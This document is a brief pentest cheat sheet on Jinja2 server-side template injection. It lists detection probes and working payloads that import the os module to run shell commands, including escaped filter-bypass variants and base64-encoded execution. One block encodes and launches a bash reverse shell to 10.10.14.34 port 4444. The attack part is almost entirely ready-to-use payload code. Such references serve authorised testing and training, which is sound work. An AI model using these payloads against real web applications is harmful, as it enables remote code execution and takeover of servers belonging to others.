##########
Jinja SSTI
##########

| SSTI => Server Side Template Injection

******
Jinja2
******

| https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

| Detect

.. code-block:: jinja

  {{7*'7'}} # resolve to 7777777
  {{7*a}} # probably will crash the app (error 500)
  {{config}} # dump config
  {{'A'.lower()}} # resolve to 'a'

| Execute bash command with os module : 

.. code-block:: jinja

  {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'ls'").read()}}{%endif%}{%endfor%}
  
  {{request.application.__globals__.__builtins__.__import__('os').popen("id").read()}}

  {%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()%}{%print(a)%}{%endwith%}

.. code-block:: jinja

  # Converting to base64
  echo -n ls | base64
  bHM=

  # Payload
  {%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo bHM=|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}

.. code-block:: jinja

  cat <<'EOF'|base64 -w 0
  bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
  EOF

  {%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC80NDQ0IDA+JjEK|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}

|

****
Tool
****

| https://github.com/epinna/tplmap


